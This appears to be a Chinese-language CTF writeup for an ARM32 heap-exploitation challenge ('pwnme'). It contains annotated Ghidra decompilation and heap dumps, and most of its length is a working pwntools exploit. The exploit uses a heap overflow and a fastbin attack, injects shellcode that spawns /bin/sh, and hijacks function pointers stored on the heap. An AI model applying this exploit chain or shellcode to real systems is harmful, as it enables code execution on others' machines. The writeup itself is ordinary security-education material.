2020年第五空间-pwnme
June 28, 2020 CTF-Writeup 访问: 36 次
pwnme
一个 arm32 pwn，而且还是堆题。我用的工具是 ghidra，arm 的题用 ida 不是太舒服。
动态调试,用qemu运行这个程序的时候,显示libc库错误,解决方法就是把libc.so文件重新链接一下(ln -s)
main 函数分析:
/*
 * Decompiled entry point (Ghidra output, annotated).
 *
 * Switches stdio to mode 2 (_IONBF, unbuffered), allocates one 8-byte heap
 * chunk holding two function pointers, calls the first one immediately, then
 * reads a single menu choice and dispatches on it.  Option 5 calls the second
 * stored pointer and exits.  No loop is visible in this decompilation, so the
 * caller presumably re-enters it per menu round -- TODO confirm.
 *
 * Review notes (defensive):
 *  - acStack24 is 8 bytes and read(0, ..., 8) may fill all of them, so atoi()
 *    can scan past the buffer when the input carries no NUL/newline; the
 *    parse then presumably continues into the adjacent locals.  Reading one
 *    byte less, or terminating explicitly, removes that.
 *  - The two code pointers live in a writable heap chunk next to the chunks
 *    that add()/edit() manage; the writeup's unbounded edit() reaches them.
 *    Keeping code pointers out of the heap (or mangling them) removes the
 *    target that option 5 dereferences.
 */
void FUN_00010aa8(void)
{
  char acStack24 [8];      /* menu choice as text; no terminator guaranteed */
  int local_10;
  code **local_c;          /* 8-byte heap chunk: two function pointers */
  /* mode 2 == _IONBF: unbuffered stdout/stdin */
  setvbuf(stdout,(char *)0x0,2,0);
  setvbuf(stdin,(char *)0x0,2,0);
  local_c = (code **)malloc(8);
  *local_c = FUN_0001058c;    /* called once, right below */
  local_c[1] = FUN_000105a8;  /* called only from option 5 */
  (**local_c)();
  meau();
  /* up to 8 bytes into an 8-byte buffer: atoi() may read past it */
  read(0,acStack24,8);
  local_10 = atoi(acStack24);
  switch(local_10) {
  case 1:
    show();
    break;
  case 2:
    add();
    break;
  case 3:
    edit();
    break;
  case 4:
    delete();
    break;
  case 5:
    /* indirect call through the heap-resident pointer */
    (*local_c[1])();
    /* WARNING: Subroutine does not return */
    exit(0);
  default:
    puts("Invalid");
  }
}
函数首先申请了8字节的堆块,里面存放了两个函数的地址(函数都是只输出一句话),然后有五个选项:
/*
 * Print the menu (option 3 is labelled "Change", 4 "Remove") followed by the
 * ">>> " prompt.  Output is identical to the decompiled original; the lines
 * are just table-driven.
 */
void meau(void)
{
  static const char *const menu_lines[] = {
    "----------------------------",
    "Normal Menu",
    "----------------------------",
    "1.Show",
    "2.Add",
    "3.Change",
    "4.Remove",
    "5.Exit",
    "----------------------------",
  };
  size_t i;
  for (i = 0; i < sizeof menu_lines / sizeof menu_lines[0]; i++)
    puts(menu_lines[i]);
  printf(">>> ");
  return;
}
审计后发现在 edit 里面存在任意长度输入而造成堆溢出。起初我按照 glibc 利用手法，先进行堆块重叠，可以泄露出来 libc，然后我想利用 fastbin attack 来修改 hook，搜了一番在 arm 架构下并没有 __malloc_hook 和 __free_hook。然后我想到 main 函数开始的时候在堆中存了两个地址，想用 fastbin attack 来修改这两个地址；利用的时候，发现 fastbin 中的链表和 glibc 下的不一样：
0x22150: 0x0000001100000000 0x0000000000000022
0x22160: 0x0000001100000000 0x0000000000000a22
0x22170: 0x0000001100000000 0x0000000000022172
0x22180: 0x0000001100000000 0x0000000000000a44
0x22190: 0x0000001100000000 0x0000000000022152
0x221a0: 0x0000001100000000 0x0000000000000a66
0x221b0: 0x00000e5100000000 0x0000000000000000
0x2106c: 0x00022018 0x00000038 0x00022058 0x00000038
0x2107c: 0x00022098 0x00000038 0x000220d8 0x00000038
0x2108c: 0x00022098 0x00000038 0x00022118 0x00000000
0x2109c: 0x00000000 0x00000008 0x00022168 0x00000000
0x210ac: 0x00000000 0x00000008 0x00022188 0x00000000
0x210bc: 0x00000000 0x00000008 0x000221a8 0x00000000
0x210cc: 0x00000000 0x00000000 0x00000000 0x00000000
然后动态调试，尝试构造出能够分配到两个函数指针的地方，最后可以修改到；伪造的数值是一个一个根据偏移试的。然后没有 one_gg，想着在堆里写入 shellcode，然后把函数指针写成堆上的地址，再利用选项 5 来调用。
exp:
from pwn import *
# Target binary; pwntools takes arch/endianness for p32()/asm() from this ELF.
context.binary = "./a.out"
context.log_level='debug'
# uClibc shipped with the challenge; every libc offset below is relative to this file.
libc = ELF("./lib/libuClibc-1.0.34.so")
'''
if local:
p = remote("106.75.126.171","33865")
elif debug:
p = process(["qemu-aarch64", "-g", "1234", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
else:
p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
'''
# Remote / gdb-stub launch lines kept as the author left them (disabled).
# r = remote("121.36.58.215","1337")
# r = process(["qemu-arm", "-g", "1234", "-L", ".", "./a.out"])
# Local run under qemu-arm with "." as sysroot (the libc symlink mentioned above lives there).
r = process(["qemu-arm", "-L", ".", "./a.out"])
# r = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
# Short aliases over the tube: send line, send raw bytes (no newline),
# send line after a prompt, receive up to a delimiter (dropped / kept).
sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
# Log a named address in hex.
li = lambda name,x : log.info(name+':'+hex(x))
# Hand the tube over to the user.
ri = lambda : r.interactive()
def add(chunk_size,value):
    """Menu option 2: request a chunk of ``chunk_size`` bytes and fill it with ``value``.

    Uses ``sla`` (sendlineafter), which is recvuntil+sendline, so the
    prompt/answer sequence is the same as the explicit ru/sl pairs.
    """
    sla('>>> ', '2')
    sla('Length:', str(chunk_size))
    sla('Tag:', value)
def delete(index):
    """Menu option 4: free the chunk at ``index`` (the binary prompts "Tag:" for it)."""
    sla('>>> ', '4')
    sla('Tag:', str(index))
def show():
    """Menu option 1: ask the binary to print its chunks; nothing is parsed here."""
    r.recvuntil('>>> ')
    r.sendline('1')
def edit(index,len,value):
    """Menu option 3: write ``len`` bytes of ``value`` into chunk ``index``.

    ``len`` shadows the builtin but is kept as the caller-visible parameter
    name.  The binary accepts any length here (see the writeup).
    """
    exchange = (
        ('>>> ', '3'),
        ('Index:', str(index)),
        ('Length:', str(len)),
        ("Tag:", value),
    )
    for prompt, answer in exchange:
        sla(prompt, answer)
def debug():
    # Attach gdb to the running tube, then block on stdin (Python 2 raw_input)
    # so breakpoints can be placed before the script continues.
    gdb.attach(r)
    raw_input()
# --- Exploit run against the local qemu-arm process (Python 2 str payloads) ---
# Only the binary's own menu is driven below.  The root cause, per the writeup,
# is edit() accepting an arbitrary length while main() keeps two raw function
# pointers in an 8-byte heap chunk.

# Four 0x38-byte chunks, indices 0-3.
add(0x38,"aaa")
add(0x38,"aaa")
add(0x38,"aaa")
add(0x38,"aaa")
# 0x49 bytes into a 0x38-byte chunk: the bytes past 0x38 (p32(0), p32(0x81))
# presumably land on the following chunk's header -- the overlap the writeup
# uses to leak libc.
edit(0,0x49,"\x11"*0x38+p32(0)+p32(0x81)+"\x22"*8)
delete(1)
add(0x38,"aaa")
show()
# Leaked 4-byte value minus the author's measured offset gives the libc base.
ru("2 : ")
libc_base = u32(r.recv(4))-0x9a8ec
system = libc_base + libc.symbols['system']
li("libc_base",libc_base)
li("system",system)
li("stack",libc.symbols['environ']+libc_base)
# Two chunks holding the author's ARM shellcode bytes (tail is "/bin/shA");
# the writeup's plan is to point one of main()'s stored function pointers at
# heap memory and trigger it through menu option 5.
add(0x38,"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41")
add(0x38,"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41")
# Six 8-byte chunks (indices 6-11 per the author's comments), then every other
# one is freed.
add(8,"\x11")#6
add(8,"\x22")#7
add(8,"\x33")#8
add(8,"\x44")#9
add(8,"\x55")#10
add(8,"\x66")#11
delete(6)
delete(8)
delete(10)
add(8,"\x99")
# Overflow from chunk 7 into the freed neighbour's header/fd; 0x22022 was
# found by trial (the closing note says the fd is XOR-encoded on this
# allocator, which is why it is not a plain heap address).
edit(7,0x20,"a"*8+p32(0)+p32(0x11)+p32(0x22022))
add(8,"\x99")
# add(8,p32(0x51800+libc_base)+p32(0x51800+libc_base))
# Same as add(8, ...) but with sd() (send, no trailing newline) so exactly
# 8 bytes are written: two copies of 0x22098, presumably the heap address of
# a shellcode chunk, replacing the stored function pointers.
ru('>>> ')
sl('2')
ru('Length:')
sl(str(8))
ru('Tag:')
sd(p32(0x22098)+p32(0x22098))
# shellcode = asm(shellcraft.aarch64.sh())
# edit(6,0x20,"a"*0x8+p32(0)+p32(0x11)+p32(0x22008))
# Menu option 5 calls the second stored function pointer (see main()).
ru('>>> ')
sl("5")
# show()
ri()
赛后看别人wp,说arm下 fastbin的链表fd指针是异或的